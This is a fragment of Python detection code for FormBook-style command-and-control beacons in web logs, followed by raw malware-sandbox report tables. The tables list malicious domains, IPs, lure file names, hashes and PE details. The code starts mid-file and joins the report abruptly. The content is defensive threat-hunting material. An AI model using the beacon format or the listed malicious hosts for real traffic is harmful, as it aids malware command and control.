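2024-07-13T00:05:14Z 10.0.0.15 GET http://www.gymroom.online/9v4b/?D0Pts04=QwF7JlY1PSjHVra+4y9GAkGIkNjMkM0Pe3Kcc1HOimPCQG1R1SgxoF7twkiq9lSaXC7xRVtY7bcnqH/14lNeqyWzLUYbSscBa/GhZ/wr7EAZrjTVHikp9QpcnDnmqECCiEdhejU=&Q8s=tdcd5h7ptjmdxx 404
2024-07-13T00:05:20Z 10.0.0.22 GET https://www.google.com/recaptcha/api.js?hl=en 200
2024-07-13T00:05:31Z 10.0.0.15 POST http://www.411divorce.com/6rlx/ 200
2024-07-13T00:05:40Z 10.0.0.22 GET http://example.org/abcd/?x=c2hvcnQ=&y=zz 200
"""

# Shape seen across the report: one 4-char path segment under the root.
PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")
# The second parameter (Q8s=tdcd5h7ptjmdxx in this build) is a short token.
SHORT_TOKEN_RE = re.compile(r"^[A-Za-z0-9]{1,24}$")
MIN_BLOB_LEN = 64  # the report's blobs are 136 chars; 64 leaves headroom


def split_query_raw(query):
    """Split 'a=b&c=d' into (name, value) pairs without decoding.

    urllib.parse.parse_qsl would turn '+' into a space and break the
    base64 check, so the split is done by hand.
    """
    pairs = []
    for part in query.split("&"):
        if part:
            name, _, value = part.partition("=")
            pairs.append((name, value))
    return pairs


def looks_like_base64_blob(value):
    """True for a long, well-formed base64 string; content is not inspected."""
    if len(value) < MIN_BLOB_LEN or len(value) % 4:
        return False
    try:
        base64.b64decode(value, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return False
    return True


def is_formbook_style_beacon(url):
    """4-char root path plus exactly two params: one blob, one short token.

    Parameter names are deliberately ignored: the report's related-sample
    table shows the same path with D0Pts04, mv0D, MdEl and CbPtaF as the
    blob parameter, so keying on a name would miss other builds.
    """
    parts = urlsplit(url)
    if not PATH_RE.match(parts.path):
        return False
    values = [v for _, v in split_query_raw(parts.query)]
    if len(values) != 2:
        return False
    blobs = sum(1 for v in values if looks_like_base64_blob(v))
    tokens = sum(1 for v in values if SHORT_TOKEN_RE.match(v))
    return blobs == 1 and tokens == 1


def parse_log(text):
    """Yield one dict per line of the constructed log format."""
    for line in text.splitlines():
        ts, client, method, url, status = line.split()
        yield {"ts": ts, "client": client, "method": method,
               "url": url, "status": int(status)}


def find_c2_activity(text):
    """Return {client: {host: request_count}} for hosts that received a beacon.

    Pass 1 marks (client, host) pairs with a structurally matching request.
    Pass 2 counts every request from that client to the same host's 4-char
    path, with or without a query: the report lists a bare /6rlx/ next to
    the parameterised form for each host, so the plain POST is attributed.
    """
    records = list(parse_log(text))
    beaconing = set()
    for r in records:
        if is_formbook_style_beacon(r["url"]):
            beaconing.add((r["client"], urlsplit(r["url"]).hostname))
    activity = {}
    for r in records:
        parts = urlsplit(r["url"])
        if (r["client"], parts.hostname) in beaconing and PATH_RE.match(parts.path):
            per_client = activity.setdefault(r["client"], {})
            per_client[parts.hostname] = per_client.get(parts.hostname, 0) + 1
    return activity


if __name__ == "__main__":
    for client, hosts in find_c2_activity(SAMPLE_LOG).items():
        for host, n in hosts.items():
            print(f"{client} -> {host}: {n} request(s) to a FormBook-style path")
```

On the constructed log this attributes two requests to www.411divorce.com (the parameterised GET and the bare-path POST) and one to www.gymroom.online for client 10.0.0.15, and nothing to 10.0.0.22: the example.org decoy has a four-character path but its query values are neither a long blob nor both short tokens. The bare-path request only counts once the same client has produced a structurally matching beacon to that host, which keeps ordinary four-character paths on unrelated sites out of the result.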
Match | Associated Sample Name / URL | Detection | Threat Name | Context
----- | ---------------------------- | --------- | ----------- | -------
www.evoolihubs.shop | SHIPPING DOCS_pdf.exe | malicious | FormBook | 188.114.96.3
www.evoolihubs.shop | purchase order_pdf.exe | malicious | FormBook | 188.114.96.3
www.evoolihubs.shop | PO454355 Pdf.exe | malicious | FormBook | 188.114.96.3
www.evoolihubs.shop | Quotation List Pdf.exe | malicious | FormBook | 188.114.97.3
www.evoolihubs.shop | arrival notice_pdf.exe | malicious | FormBook | 188.114.97.3
www.evoolihubs.shop | AirWaybill_Document Pdf.exe | malicious | FormBook | 188.114.97.3
www.shaf-kupe-msk.store | SHIPPING DOCS_pdf.exe | malicious | FormBook | 45.130.41.38
www.shaf-kupe-msk.store | purchase order_pdf.exe | malicious | FormBook | 45.130.41.38
www.shaf-kupe-msk.store | arrival notice_pdf.exe | malicious | FormBook | 45.130.41.38
www.noghteyab.com | Document.exe | malicious | FormBook | 51.89.93.192
www.noghteyab.com | SHIPPING DOCS_pdf.exe | malicious | FormBook | 51.89.93.193
www.noghteyab.com | SecuriteInfo.com.Exploit.CVE-2017-11882.123.8256.26893.rtf | malicious | FormBook | 46.105.190.248
www.noghteyab.com | purchase order_pdf.exe | malicious | FormBook | 51.89.93.193
www.noghteyab.com | arrival notice_pdf.exe | malicious | FormBook | 51.89.93.193
www.hectmalt.xyz | SHIPPING DOCS_pdf.exe | malicious | FormBook | 203.161.41.207
www.hectmalt.xyz | purchase order_pdf.exe | malicious | FormBook | 203.161.41.207
www.hectmalt.xyz | arrival notice_pdf.exe | malicious | FormBook | 203.161.41.207
Match | Associated Sample Name / URL | Detection | Threat Name | Context
----- | ---------------------------- | --------- | ----------- | -------
CLOUDFLARENETUS | ARRIVAL NOTICE.exe | malicious | AgentTesla | 104.26.12.205
CLOUDFLARENETUS | https://download.cnet.com/download/wcfstorm/3000-2218_4-10914361.html | malicious | Unknown | 104.19.178.52
CLOUDFLARENETUS | SecuriteInfo.com.Win64.HacktoolX-gen.11863.1266.exe | malicious | Unknown | 104.26.0.5
CLOUDFLARENETUS | https://ik.imagekit.io/gxpn0jo1s/tgearwtyetgwaetgwa4t6w4a6yytyseztsetsetserte.html?updatedAt=3047319305?0595vfs0snhw3jn#4XoKCq127845cDyC289vehxtterqj1617VXBGKGZCTGTHTMC44244/256826q14 | malicious | Unknown | 188.114.96.3
CLOUDFLARENETUS | SecuriteInfo.com.Win64.HacktoolX-gen.11863.1266.exe | malicious | Unknown | 104.26.0.5
CLOUDFLARENETUS | https://jobs.softworldinc.com | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFhUV4hji8G1tNbN7GWNRgqNqYemng2PpFVkqXnlInizGtxny_OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZMkq8x0xejOvqg0qdKKIxtcx-2BGywLUWl-2Buiu5kjTO2RrwfD9LQHAvbCogNbw7LnfmDAYpmH9emIBdM37OJW7sSXeSn9dRdufPdqH51JJvOJtIpmY2bkNryxnOhVxBv956ezqniWDxNQG1auD6c9Fzvbk7UWS50KG3NjmS1tVxjDCbqAJE3Xf-2B5r1RpfRYd3TGF-2B-2FZsLP26s37yzm5-2BksTv5GtMCcpDEJ5fpnll12DCN7ceYHk9rW2YWLkkQuZ9T2Bs-3D | malicious | Unknown | 188.114.96.3
CLOUDFLARENETUS | https://mnconsulting.com.au/8537659878_pdf.html | malicious | CVE-2024-21412 | 104.16.231.132
CLOUDFLARENETUS | https://www.softworldinc.com | malicious | Unknown | 104.16.117.43
CLOUDFLARENETUS | http://sherwoodhomeshow.com | malicious | Unknown | 104.18.11.207
CYBERTRAILSUS | sora.x86.elf | malicious | Mirai | 162.42.122.255
CYBERTRAILSUS | SHIPPING DOCS_pdf.exe | malicious | FormBook | 162.43.105.95
CYBERTRAILSUS | NGL 700800.exe | malicious | FormBook | 162.43.101.114
CYBERTRAILSUS | purchase order_pdf.exe | malicious | FormBook | 162.43.94.40
CYBERTRAILSUS | Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe | malicious | FormBook | 162.43.101.114
CYBERTRAILSUS | spec 4008670601 AZTEK Order.exe | malicious | FormBook | 162.43.101.114
CYBERTRAILSUS | SOA 020724.exe | malicious | FormBook | 162.43.101.114
CYBERTRAILSUS | Inquiry No PJO-4010574.exe | malicious | FormBook | 162.43.101.114
CYBERTRAILSUS | arrival notice_pdf.exe | malicious | FormBook | 162.43.94.40
CYBERTRAILSUS | 288292021 ABB.exe | malicious | FormBook | 162.43.101.114
PARSONLINETehran-IRANIR | SHIPPING DOCS_pdf.exe | malicious | FormBook | 5.78.41.174
PARSONLINETehran-IRANIR | purchase order_pdf.exe | malicious | FormBook | 5.78.41.174
                                                          exe4.bin.bak.exeGet hashmaliciousBlackMoon, GhostRatBrowse
                                                          • 5.78.93.88
                                                          arm5-20240706-0316.elfGet hashmaliciousMiraiBrowse
                                                          • 91.98.88.14
                                                          botx.x86.elfGet hashmaliciousMiraiBrowse
                                                          • 91.98.39.84
                                                          f9DYXBf380.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 46.62.234.74
                                                          http://www.instegeram.ir/Get hashmaliciousUnknownBrowse
                                                          • 31.214.171.171
                                                          http://insig.orgGet hashmaliciousUnknownBrowse
                                                          • 134.255.201.92
                                                          http://insig.orgGet hashmaliciousUnknownBrowse
                                                          • 134.255.201.92
                                                          RpHVKGndFL.elfGet hashmaliciousUnknownBrowse
                                                          • 82.99.248.251
                                                          OVHFRhttps://eu-central.storage.cloudconvert.com/tasks/7667d2fd-6c13-460b-8f55-f179433b3df4/bfcce31c888656d9c91c1b50d320f0648923cfac65d48f69d06cc63b929442e7.zip?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=cloudconvert-production%2F20240712%2Ffra%2Fs3%2Faws4_request&X-Amz-Date=20240712T095048Z&X-Amz-Expires=86400&X-Amz-Signature=24a9e07e4d7f7a1e041068ee72845360480440bd0d03e47d7a22ccf3f04b294d&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3D%22bfcce31c888656d9c91c1b50d320f0648923cfac65d48f69d06cc63b929442e7.zip%22&response-content-type=application%2Fzip&x-id=GetObjectGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                          • 51.89.41.105
                                                          https://eu-central.storage.cloudconvert.com/tasks/7667d2fd-6c13-460b-8f55-f179433b3df4/bfcce31c888656d9c91c1b50d320f0648923cfac65d48f69d06cc63b929442e7.zip?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=cloudconvert-production%2F20240712%2Ffra%2Fs3%2Faws4_request&X-Amz-Date=20240712T095048Z&X-Amz-Expires=86400&X-Amz-Signature=24a9e07e4d7f7a1e041068ee72845360480440bd0d03e47d7a22ccf3f04b294d&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3D%22bfcce31c888656d9c91c1b50d320f0648923cfac65d48f69d06cc63b929442e7.zip%22&response-content-type=application%2Fzip&x-id=GetObjectGet hashmaliciousUnknownBrowse
                                                          • 51.195.5.198
                                                          crosscheckrosefloweronhairbeauty.gIF.vbsGet hashmaliciousRemcosBrowse
                                                          • 139.99.220.222
                                                          yrBA01LVo2.exeGet hashmaliciousWannacryBrowse
                                                          • 192.99.167.1
                                                          1qPnokLANh.vbsGet hashmaliciousUnknownBrowse
                                                          • 213.186.33.5
                                                          druMBYw2n4.vbsGet hashmaliciousUnknownBrowse
                                                          • 213.186.33.5
                                                          AuTZA3eZbq.vbsGet hashmaliciousUnknownBrowse
                                                          • 213.186.33.5
                                                          ImBrdcY7JB.vbsGet hashmaliciousUnknownBrowse
                                                          • 213.186.33.5
                                                          V-Mail_maryland.gov.htmlGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                          • 149.202.238.105
                                                          swCQS5MMLX.rtfGet hashmaliciousRemcosBrowse
                                                          • 139.99.220.222
                                                          WEBSUPPORT-SRO-SK-ASSKSHIPPING DOCS_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • 37.9.175.173
                                                          purchase order_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • 37.9.175.173
                                                          arrival notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • 37.9.175.173
                                                          TERMINI CONTRATTUALI-pdf.exeGet hashmaliciousGuLoaderBrowse
                                                          • 185.111.89.173
                                                          sDS901SDKw.exeGet hashmaliciousGuLoaderBrowse
                                                          • 185.111.89.173
                                                          WARUNKI UMOWY-pdf.exeGet hashmaliciousGuLoaderBrowse
                                                          • 185.111.89.173
                                                          WARUNKI UMOWY-pdf.exeGet hashmaliciousGuLoaderBrowse
                                                          • 185.111.89.173
                                                          0420-pdf.exeGet hashmaliciousGuLoaderBrowse
                                                          • 185.111.89.173
                                                          _____S__.EXE.exeGet hashmaliciousGuLoaderBrowse
                                                          • 185.111.89.173
                                                          S#U00d6ZLE#U015eME #U015eARTLARI-pdf.exeGet hashmaliciousGuLoaderBrowse
                                                          • 185.111.89.173
                                                          No context
                                                          No context
Process: C:\Users\user\Desktop\docs_pdf.exe
File Type: data
Category: dropped
Size (bytes): 274432
Entropy (8bit): 7.992961635704826
Encrypted: true
SSDEEP: 6144:vgo2X+76o89IbmP+WtlUYUrfEudy2SwQ4Y/rhCrKSNXa9lNlE9ax:vX2Xbo89VvtlArfBE2nQBC2oK7x
MD5: BC2BF77D3548E1838A5117E14C263965
SHA1: 7DFD18962E2955698BB0CC503EA3BBD07D743E3C
SHA-256: 51A5D7A777E6D9A21210744F372F6C63507999FF98C0C62D29C1685AF09396D2
SHA-512: 9F9CF8C7D177885575D2878E37050B628972B9CF8A9B9366D27585BE0AF9F6C9E0ED03D3A46FF2618A8EE2D1F09741A187EBAB2495A5C81A316EB6C8810819A6
Malicious: false
Reputation: low
Process: C:\Users\user\Desktop\docs_pdf.exe
File Type: data
Category: dropped
Size (bytes): 9808
Entropy (8bit): 7.603484159825722
Encrypted: false
SSDEEP: 192:ZyaFcKUr9fp488cPCkTcmkX6R7gcmdlhlFHT+KQTcULdkJwybH4b:3F7Ur9fp48irndbXM9TTBkJwt
MD5: F394195C78BA42F042223E8A3B74ACC0
SHA1: BCD7AB9ADC9C52C2611D78E7063C25596C80F546
SHA-256: 39D84B0641A1801009699643D11778D25F758A69514A12E69C50A990570E0F60
SHA-512: 2CDAF4A9D17E9E75B696F9A60EA4AF9340B169DA02F130D971DD401B3F945337B6337BB9C431B71A09972F7C4FBC41C4232CD159F5E7490608E56437A3D8E6FB
Malicious: false
Reputation: low
Process: C:\Users\user\Desktop\docs_pdf.exe
File Type: ASCII text, with very long lines (28756), with no line terminators
Category: dropped
Size (bytes): 28756
Entropy (8bit): 3.5876462758996204
Encrypted: false
SSDEEP: 768:4iTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbX+IZ6Gg4vfF3if6gyHp:4iTZ+2QoioGRk6ZklputwjpjBkCiw2Rb
MD5: 8EBFD804D981AB197EC6D1EC5BE9DCED
SHA1: B71E604E200E2844968886BEAE39B1B46FDC9FE9
SHA-256: 3BD277503FADC45BC469DDE7D3E06B3B647F97FF8B7B559F5849A952359D7002
SHA-512: 4B11139D699D7E09DA6D275D4FB4C39AF3C4F5B99271BF12B7A77BBEE8900F450D208DF1601B6AD53CC74993F003F396DAF925B4E38B68D89E787BF35EEEFFE7
Malicious: false
Reputation: low
Process: C:\Windows\SysWOW64\isoburn.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.1239949490932863
Encrypted: false
SSDEEP: 384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5: 271D5F995996735B01672CF227C81C17
SHA1: 7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256: 9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512: 62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious: false
Reputation: moderate, very likely benign file
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.149453792818417
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: docs_pdf.exe
File size: 1'193'984 bytes
MD5: 4a7d2fd983aa91d5d3b7bec3c430a825
SHA1: 34d5c4c7e639a9cd89dc857dc2322f3a86962a3e
SHA256: b193b97622b50825390d67d4bc9ae41c2da72c2c7f2beeb3b9fb0666fe892ae1
SHA512: d3bd40bbc2e90c6503b2890d6e1c70673497dada3bc28693cee85b4d4192f248827ffba121d455c457b304805b8d0b23ea42717fba7a9d79b1dd6c37788c9b0e
SSDEEP: 24576:cAHnh+eWsN3skA4RV1Hom2KXMmHalp4NWTno7LjUyuDRl5:7h+ZkldoPK8YalCNWzo/CV
TLSH: 6845BE0273D1C036FFABA2739B6AF64156BC79254123852F13981DB9BC701B2267E763
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
Icon Hash: aaf3e3e3938382a0
Entrypoint: 0x42800a
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x668F1447 [Wed Jul 10 23:07:51 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: afcdf79be1557326c854b6e20cb900a7
Instruction
call 00007F080CDEDE5Dh
jmp 00007F080CDE0C14h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F080CDE0D9Ah
cmp edi, eax
jc 00007F080CDE10FEh
bt dword ptr [004C41FCh], 01h
jnc 00007F080CDE0D99h
rep movsb
jmp 00007F080CDE10ACh
cmp ecx, 00000080h
jc 00007F080CDE0F64h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F080CDE0DA0h
bt dword ptr [004BF324h], 01h
jc 00007F080CDE1270h
bt dword ptr [004C41FCh], 00000000h
jnc 00007F080CDE0F3Dh
test edi, 00000003h
jne 00007F080CDE0F4Eh
test esi, 00000003h
jne 00007F080CDE0F2Dh
bt edi, 02h
jnc 00007F080CDE0D9Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F080CDE0DA3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F080CDE0DF5h
bt esi, 03h
Programming Language:
• [ASM] VS2013 build 21005
• [ C ] VS2013 build 21005
• [C++] VS2013 build 21005
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2013 UPD5 build 40629
• [RES] VS2013 build 21005
• [LNK] VS2013 UPD5 build 40629
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbc0cc | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc8000 | 0x59010 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x122000 | 0x7134 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4b50 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dfdd | 0x8e000 | 310e36668512d53489c005622bb1b4a9 | False | 0.5735602580325704 | data | 6.675248351711057 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2fd8e | 0x2fe00 | 748cf1ab2605ce1fd72d53d912abb68f | False | 0.32828818537859006 | data | 5.763244005758284 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbf000 | 0x8f74 | 0x5200 | aae9601d920f07080bdfadf43dfeff12 | False | 0.1017530487804878 | data | 1.1963819235530628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc8000 | 0x59010 | 0x59200 | c3d3ccba5171c79fdd0f5094d9b0d61d | False | 0.9275754952664796 | data | 7.896666235899599 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x122000 | 0x7134 | 0x7200 | f04128ad0f87f42830e4a6cdbc38c719 | False | 0.7617530153508771 | data | 6.783955557128661 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc84a0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc85c8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc88b0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc89d8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc9880 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xca128 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xca690 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xccc38 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xcdce0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_STRING | 0xce148 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xce6dc | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xced68 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xcf1f8 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xcf7f4 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcfe50 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xd02b8 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xd0410 | 0x506a6 | data | (none) | (none) | 1.0003369947355958
RT_GROUP_ICON | 0x120ab8 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x120b30 | 0x14 | data | English | Great Britain | 1.15
RT_VERSION | 0x120b44 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x120c20 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Imports
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
